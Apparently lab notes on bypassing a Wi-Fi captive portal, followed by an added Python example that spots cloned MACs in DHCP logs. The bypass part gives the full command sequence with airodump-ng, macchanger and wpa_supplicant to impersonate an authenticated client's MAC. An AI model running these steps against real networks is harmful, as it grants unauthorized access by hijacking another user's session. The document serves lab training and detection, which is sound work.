# Captive portal bypass

## 1. Discover

```bash
# Setup monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Scan networks & APs
sudo airodump-ng wlan0mon
```

Pick a target and check whether it presents a captive portal:

<figure><img src="/files/tOax9enEATDkmQSX2l9g" alt=""><figcaption></figcaption></figure>

## 2. Find authenticated clients

```bash
sudo airodump-ng wlan0mon --band abg --bssid F0:9F:C2:71:22:10 -c 6
```

## 3. Change our own MAC to an authenticated client's MAC

```bash
ip link set wlan2 down
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up
```

## 4. Connect to network

Once we know the ESSID, we can connect to the network. To do that, we create a `free.conf` file so we can connect from bash using `wpa_supplicant`.

```bash
root@WiFiChallengeLab:~# cat free.conf 
network={
	ssid="wifi-guest"
	key_mgmt=NONE
	scan_ssid=1
}
```

Start the connection:

```bash
wpa_supplicant -Dnl80211 -iwlan2 -c free.conf
```

In another terminal as root (get IP):

```bash
dhclient wlan2 -v
```

Successfully bypassed!
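
The bypass works because the portal ties its authenticated state to the client MAC address, so on the server side a cloned MAC shows up as one MAC presenting two different DHCP identities. The following is an added detection example, not part of the original notes; the log format, hostnames, timestamps and option 55 (parameter request list) values are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed DHCP server log lines (hypothetical format): the portal has
# authorized b0:72:bf:44:b0:49, then a second device requests with the same MAC.
SAMPLE_LOG = """\
2024-05-01T10:00:02 DHCPREQUEST mac=b0:72:bf:44:b0:49 host=pixel-7 prl=1,3,6,15,26,28,51,58,59,43
2024-05-01T10:05:40 DHCPREQUEST mac=3c:22:fb:10:9a:01 host=macbook prl=1,121,3,6,15,119,252,95,44,46
2024-05-01T10:30:02 DHCPREQUEST mac=b0:72:bf:44:b0:49 host=pixel-7 prl=1,3,6,15,26,28,51,58,59,43
2024-05-01T10:31:17 DHCPREQUEST mac=b0:72:bf:44:b0:49 host=WiFiChallengeLab prl=1,28,2,3,15,6,119,12,44,47,26,121,42
2024-05-01T10:35:40 DHCPREQUEST mac=3c:22:fb:10:9a:01 host=macbook prl=1,121,3,6,15,119,252,95,44,46
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) DHCPREQUEST mac=(?P<mac>[0-9a-f:]{17}) "
    r"host=(?P<host>\S*) prl=(?P<prl>[\d,]+)$", re.IGNORECASE)

def find_shared_macs(log_text):
    """Return {mac: [(first_seen, host, prl), ...]} for MACs with >1 identity."""
    seen = defaultdict(dict)  # mac -> {(host, prl): first_seen timestamp}
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines that are not DHCPREQUEST records
        # Hostname plus option 55 order acts as a coarse device fingerprint.
        identity = (m["host"].lower(), m["prl"])
        seen[m["mac"].lower()].setdefault(identity, m["ts"])
    alerts = {}
    for mac, identities in seen.items():
        if len(identities) > 1:
            alerts[mac] = sorted((ts, h, p) for (h, p), ts in identities.items())
    return alerts

if __name__ == "__main__":
    for mac, ids in find_shared_macs(SAMPLE_LOG).items():
        print(f"possible cloned MAC {mac}:")
        for ts, host, prl in ids:
            print(f"  first seen {ts} host={host} option55={prl}")
```

A hit is a lead rather than proof, since an OS reinstall or dual-boot machine also changes the fingerprint; correlating with the AP the client associated to narrows it down.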
